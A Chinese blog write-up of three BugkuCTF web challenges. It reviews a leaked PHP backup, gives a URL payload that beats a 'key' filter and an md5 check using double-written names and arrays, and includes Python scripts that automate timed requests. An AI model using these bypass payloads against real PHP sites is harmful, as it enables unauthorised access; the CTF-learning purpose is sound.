bugkuctf 备份是个好习惯,秋名山老司机,速度要快

最新推荐文章于 2023-08-16 15:20:13 发布
最新推荐文章于 2023-08-16 15:20:13 发布
阅读量476 收藏
点赞数
分类专栏: 网络安全web 文章标签: bugkuctf 备份是个好习惯 秋名山老司机 速度要快
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Yu_csdnstory/article/details/94407663
版权

备份是个好习惯

通过地址发现有个备份,查看大佬的wp发现有。bak文件,加上之后,下载得到一份php.bak文件

include_once "flag.php";
ini_set("display_errors", 0);
$str = strstr($_SERVER['REQUEST_URI'],'?');
$str = substr($str,1);
$str = str_replace('key','',$str);
parse_str($str);
echo md5($key1);

echo md5($key2);
if(md5($key1) == md5($key2) && $key1 !== $key2){
    echo $flag."取得flag";
}
?>

分析代码:

首先看到包含了flag.php,下面是个状态更新函数,可以忽略
strstr函数将返回从被查找字符之后的字符
其实,它是有三个参数的,string strstr( string $haystack, mixed $needle[, bool $before_needle = false] )

返回 haystack 字符串从 needle 第一次出现的位置开始到 haystack 结尾的字符串。

<?php
$email  = 'name@example.com';
$domain = strstr($email, '@');
echo $domain; // 打印 @example.com

$user = strstr($email, '@', true); // 从 PHP 5.3.0 起
echo $user; // 打印 name
?>

substr
返回字符串的子串,原型string substr( string $string, int $start[, int $length] )
返回字符串 string 由 start 和 length 参数指定的子字符串。

如果提供了正数的 length,返回的字符串将从 start 处开始最多包括 length 个字符(取决于 string 的长度)。

如果提供了负数的 length,那么 string 末尾处的 length 个字符将会被省略(若 start 是负数则从字符串尾部算起)。如果 start 不在这段文本中,那么将返回 FALSE。

如果提供了值为 0,FALSE 或 NULL 的 length,那么将返回一个空字符串。

如果没有提供 length,返回的子字符串将从 start 位置开始直到字符串结尾。

<?php
$rest = substr("abcdef", 0, -1);  // 返回 "abcde"
$rest = substr("abcdef", 2, -1);  // 返回 "cde"
$rest = substr("abcdef", 4, -4);  // 返回 ""
$rest = substr("abcdef", -3, -1); // 返回 "de"
?>

str_replace

str_replace( mixed $search, mixed $replace, mixed KaTeX parse error: Expected 'EOF', got '&' at position 15: subject[, int &̲count] )

该函数返回一个字符串或者数组。该字符串或数组是将 subject 中全部的 search 都被 replace 替换之后的结果。

如果没有一些特殊的替换需求(比如正则表达式),你应该使用该函数替换 ereg_replace() 和 preg_replace()。

参数

如果 search 和 replace 为数组,那么 str_replace() 将对 subject 做二者的映射替换。如果 replace 的值的个数少于 search 的个数,多余的替换将使用空字符串来进行。如果 search 是一个数组而 replace 是一个字符串,那么 search 中每个元素的替换将始终使用这个字符串。该转换不会改变大小写。

如果 search 和 replace 都是数组,它们的值将会被依次处理。

例如:

<?php
// 赋值: <body text='black'>
$bodytag = str_replace("%body%", "black", "<body text='%body%'>");

// 赋值: Hll Wrld f PHP
$vowels = array("a", "e", "i", "o", "u", "A", "E", "I", "O", "U");
$onlyconsonants = str_replace($vowels, "", "Hello World of PHP");

// 赋值: You should eat pizza, beer, and ice cream every day
$phrase  = "You should eat fruits, vegetables, and fiber every day.";
$healthy = array("fruits", "vegetables", "fiber");
$yummy   = array("pizza", "beer", "ice cream");

$newphrase = str_replace($healthy, $yummy, $phrase);

// 赋值: 2
$str = str_replace("ll", "", "good golly miss molly!", $count);
echo $count;
?>

parse_str
parse_str — 将字符串解析成多个变量

所以整个代码结合起来的意思就是得到用户输入的?后面的内容,将里面的ke’y全部置换为空,然后输出key1和key2的hash值,如果key1的hash值等于key2的hash值,且他们不相等,就输出flag

我们可以用kkeyey1绕过对key的抹杀,key1和key2都用数组表示,由于hash无法对数组加密,返回false,相同,得到flag

http://123.206.87.240:8002/web16/?kekeyy1[0]=2&kekeyy2[1]=2

秋名山老司机

两秒内计算这个式子,并且赋值给value这个变量,我们可以想到用脚本,request库。
脚本如下:

import requests
import re
url="http://123.206.87.240:8002/qiumingshan/"
s=requests.session()
u=s.get(url)
p=re.findall(r'<div>(.*)=\?;</div>',u.text)[0]
r=eval(p)
payload = {'value': r}
h = s.post(url, data=payload)
print(h.text)
'''
https://www.cnblogs.com/xiaogou/p/9233392.html
'''

脚本解释:
引入库名就不说了。
我们需要请求这个session对象,以免下次它的计算的式子会发生改变,然后是正则匹配
正则匹配的findall会返回列表,匹配的是括号里面的内容,从遇到前面的div标签开始,到后面的=?;和div的结束标签结束。通过转义符将?号转义
括号中的.代表着除了换行符之外的所有都匹配*则表示匹配多次

参考匹配链接1
参考匹配链接2
匹配的结果是只剩下这个式子,用过eval计算出来结果
用字典类型,将式子的值赋给value,然后通过post传值,最后输出运行后的内容,得到flag
隐藏后面部分内容

速度要快


查看源代码发现需要传入margin这个变量,在消息的相应头部我们发现了flag,是base64加密过的,还加密了两次。

我们对它进行解密:

再次解码:

这可能就是我们需要传入的值,因为请求一次,它的flag值就会变化一次,我们需要保证传入的post传的值与我们get方式请求得到的flag值在同一个会话中,提示要快,我们就用脚本跑一下试试。

import requests
import base64
url = "http://123.206.87.240:8002/web6/"
session = requests.Session()
myrequests = session.get(url)   # 记录下session
header_flag = myrequests.headers['flag']
header_flag_decode = base64.b64decode(header_flag)  # python3这个操作会导致生成bytes对象,python2直接可以使用decodestring
header_flag_decode = header_flag_decode.decode()    # 因为上一步解码时生成了bytes类型对象,需要转化为string,decode()默认编码是utf-8
margin_value = header_flag_decode.split(": ")[1]    # 取他说的flag内容,作为margin参数值
page = session.post(url, {"margin": base64.b64decode(margin_value)})
print(page.text)

这是大佬的脚本,我们首先得获取它的会话,然后从头部得到.headers的信息,获取flag变量,这是我写不出来的部分,学了点儿爬虫,有个地方就是我们将第一次解码后的bytes对象转化为string,就是进行再次编码,用splite()分割第一次解码后的"flag",除去列表框,进行二次解码,得到的变量再传输到margin里。
运行脚本,得到flag:
省略后面几位

舞动的獾
关注
专栏目录
CTF Bugku 备份是个好习惯
lived的博客
05-26 316
CTF Bugku 备份是个好习惯 [题目链接](http://123.206.87.240:8002/web16/) d41d8cd98f00b204e9800998ecf8427ed41d8cd98f00b204e9800998ecf8427e 首先进入页面发现如上字符串,刚开始试了各种decode,发现没有效果;之后就看了writeup(毕竟刚开始),根据大佬的说法,从题目下手‘备份’,仔...
BugkuCTF练习题解——Web一
qq_41739275的博客
08-24 6581
文章目录1.Web22.计算器3.Web基础$_GET4.Web基础$_POST5.矛盾6.Web37.域名解析8.你必须让他停下9.本地包含10.变量111.Web512.头等舱13.网站被黑14.管理员系统15.Web416.flag在index中17.输入密码查看flag18.点击100万次19.备份是个好习惯 1.Web2 打开链接之后是滑稽笑脸,好家伙,吓我一跳,还以为是大bug,然后也没有提示啥的 感觉有点无从下手???别急,打开页面源代码(检查元素也可)瞅瞅 注释部分就是flag了。 2.
bugkuCTF_备份是个好习惯
qq_46635165的博客
09-21 253
打开题目网址,入眼一串md5值,解密为空值: 抠题目字眼,备份两个字,联想到 .bak 或者 .swp 文件,利用御剑扫描网址,发现一个 .bak 文件: 访问下载得到 index.php 的源码, <?php /** * Created by PhpStorm. * User: Norse * Date: 2017/8/6 * Time: 20:22 */ include_once "flag.php"; ini_set("display_errors", 0); $str = str
BugkuCTF-web16(备份是个好习惯)
分享与记录
04-04 1289
解题要点 使用御剑、dirmap 或者 dirsearch 等扫描工具,扫除备份文件所在位置 打开备份文件,代码如下: <?php /** * Created by PhpStorm. * User: Norse * Date: 2017/8/6 * Time: 20:22 */ include_once "flag.php"; ini_set("display_errors", 0); $str = strstr($_SERVER['REQUEST_URI'], '?'); $st
Bugku-CTF备份是个好习惯
weixin_33734785的博客
04-22 315
Day17 备份是个好习惯 听说备份是个好习惯 http://123.206.87.240:8002/web16/ 本题要点:MD5加密、.bak文件、 strstr()、substr()、str_replace()、parse_str()函数用法 看到一串md5字符 解一下 . emmm,只能换个思路 备份这个关键字! 我们可...
BugkuCTF备份是个好习惯
热门推荐
超人学飞的日子
06-05 2万+
在做到Bugku的一道题目时,感觉知识点有些多,这里总结一下。题目连接http://120.24.86.145:8002/web16/打开界面只有这一串字符串尝试各种解密解码格式都没有效果,可以观察到整个字符串是d41d8cd98f00b204e9800998ecf8427e的两段重复,其实是MD5加密,最后再揭晓。那现在怎么办呢,按照题目  备份是个好习惯,是让我们寻找  .bak文件的,也就是...
CTF|BugkuCTF-WEB解题思路
这里是一处长期不更新的博客
06-15 1972
截止至练习题【login4】,仅提供解题思路。 WEB2 按F12直接可得flag 计算器: 直接按F12,将maxlength修改,输入正确结果即可得到flag web基础$_GET URL输入:http://123.206.87.240:8002/get/?what=flag web基础$_POST 使用hackbar工具,按F12,打开Post data,传递what=flag。 矛盾 这里是使用is_numeric遇到%00截断的漏洞,这里构造 http://120.24.86.145:8002.
BugkuCTF web 输入密码查看flag——never give up
the_world_go的博客
04-06 956
输入密码查看flag 看到要输入密码(爆破爆破爆破)。 打开bp抓包。爆破(果然弱密码) 输入密码得到 flag{bugku-baopo-hah} 点击一百万次好像网页崩了(也有可能我太菜了),进不去。。。 备份是个好习惯 打开网页,一段乱码。好的我看不懂,看源码没线索,抓包,没发现 拿御剑扫下后台吧 找到了 可以看到我要提交key1和key2,他们不相等但是md5处理以后相等 参考php漏洞...
BugkuCTF(Web) WriteUp
CallMeSa1tyFish的博客
08-06 6128
Web部分 web2 点开以后发现是满屏的滑稽,按照国际惯例,查看源代码发现flag 文件上传测试 用burp抓包修改文件名后缀为.php 计算器 修改最大长度限制 web基础$_GET 题目如下 $what=$_GET['what']; echo $what; if($what=='flag') echo 'flag{****}'; 直接输入?what=fla...
[Bugku][Web][CTF] 16-29 write up
dadongwudi的博客
12-26 349
web16 备份是个好习惯 /index.php.bak 查看php代码 1.因为md5()函数加密不能处理数组,则key1和key2的返回值为空,即可获得flag http://123.206.87.240:8002/web16/?kkeyey1[]=1&kkeyey2[]=4 2.利用==比较漏洞 如果两个字符经MD5加密后的值为 0exxxxx形式,就会被认为是科学计数法,且表示的是0*10的xxxx次方,还是零,都是相等的。 下列的字符串的MD5值都是0e开头的: QNKCDZO 2406
ctf web 备份是个好习惯
god_001的博客
04-03 1540
题目: 打开网址出现: 看着像是两段重复的md5摘要,用解码工具解码,得到: 看出似乎是对空字符生成了md5码并输出,回头看题目描述:备份是个好习惯,猜测是查看备份文件 尝试输入网址 http://114.67.175.224:18504/index.php.bak,果然得到一个备份文件:index.php.bak 删除文件后缀名 .bak,打开文件: php代码解释: 第11行:$str = strstr($_SERVER['REQUEST_URI'], '?'); $
CTF-web】备份是个好习惯(查找备份文件、双写绕过、md5加密绕过)
最新发布
Sankkl1的博客
08-16 958
由代码可知我们要绕过md5加密,两数如果满足科学计数法的形式的话,php会将其当作科学计数法所得的数字来进行比较,根据该原理,如果两个md5码是0e开头且满足科学计数法的表示形式就会判断相等(只对==比较有效,===无效)。还有一个问题,那就是str_replace()函数,原代码中会将’key’给删去,所以我们要用双写绕过,将key写成kekeyy即可。经过扫描可以找到index.php.bak备份文件,下载下来后打开发现是index.php的原代码,如下图所示。于是在url最后输入?
BugkuCTF:点击一百万次;备份是个好习惯
s0il的博客
03-03 879
点击一百万次 问题描述: 提示是js 查看源码: 使用burpsuite抓包,之后改变请求方法: 之后改参数clicks是1000000以上,go一下,得到flag备份是个好习惯 点击后出现类似md5的密文: 查询之...
bugku 备份是个好习惯
Superpig的博客
11-10 1045
思路 1、根据提示,猜测此题的url下还有其他目录文件 2、用dirsearch扫一下,发现了http://123.206.87.240:8002/web16/index.php.bak 3、搜一下,发现下载了一个文件,用notepad++打开,是一段php源码 4、分析可知,页面里出现的是key1和key2的md5值,解密得undefined,这是因为没有传入他们的值,当key1不等于key2而...
BugKuCTF中套路满满的题-------备份是个好习惯
qq_42133828的博客
12-07 3116
首先就点进去是一串字符 d41d8cd98f00b204e9800998ecf8427ed41d8cd98f00b204e9800998ecf8427e 仔细看会发现这是两个一样的字符串,只不过拼接在一起了,MD5解密后的明文是  空 再看题目的标题是备份,那么就看看本网页的备份文件把 输入 123.206.87.240:8002/web16/index.php.bak 注:.bak...
BugkuCTF-web-备份是个好习惯 writeup
会下雪的晴天
07-11 870
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 个人收获:常用备份文件后缀:*.swp,*.bak md5函数漏洞 php弱判断 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 题目描述 题目传送门:http://123.206.87.240:...
CTFBugku 备份是个好习惯
weixin_41607190的博客
10-07 341
原理:御剑扫描后台网址,分析代码,提交的url会过滤key字符,构造kkeyey=参数;使md5字符不同,值相同,MD5绕过 发现有个index.php.bak,打开是下载一个东西 <?php /** * Created by PhpStorm. * User: Norse * Date: 2017/8/6 * Time: 20:22 */ include_once "flag...
BugKu:备份是个好习惯
Zeker62的博客
09-16 875
解题过程 了解到备份二字,说明可能存在备份文件备份文件的好处是:浏览器无法解析带有备份后缀的文件,之后会直接提供用户下载到本地,用户通过去掉备份后缀打开可以查看页面源代码进行代码审计 通过查找,查到index.php.bak这个备份文件 在浏览器输入后下载到本地返现是PHP代码: <?php /** * Created by PhpStorm. * User: Norse * D...
Bugku——备份是个好习惯
王嘟嘟的博客
11-15 365
0x00 前言 今日份CTF。 2018年11月15日 题目 0x01 start 打开题目发现是一个 这个东西不知道这个是什么。根据题目,可能是让找一个备份文件。 这里有一款工具。 SourceLeakHacker 找到了一个bac,我们来看一下。 这里发现源码。 简单的看一下,使用数组绕过md5 发现没有效果,再次看下源码。 发现直接把key给删除了,使用双写绕过。 ...
CTF WEB题型总结第六课实战练习(二) - 入门第一部分
bugku-ctf 第二题:名山老司机 题目描述:欢迎来到名山!在这里,你将面临各种挑战。只有真正的老司机才能够成功通过所有关卡。 解题思路:这个题目可能存在文件上传漏洞。我们可以尝试上传一些恶意的文件,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值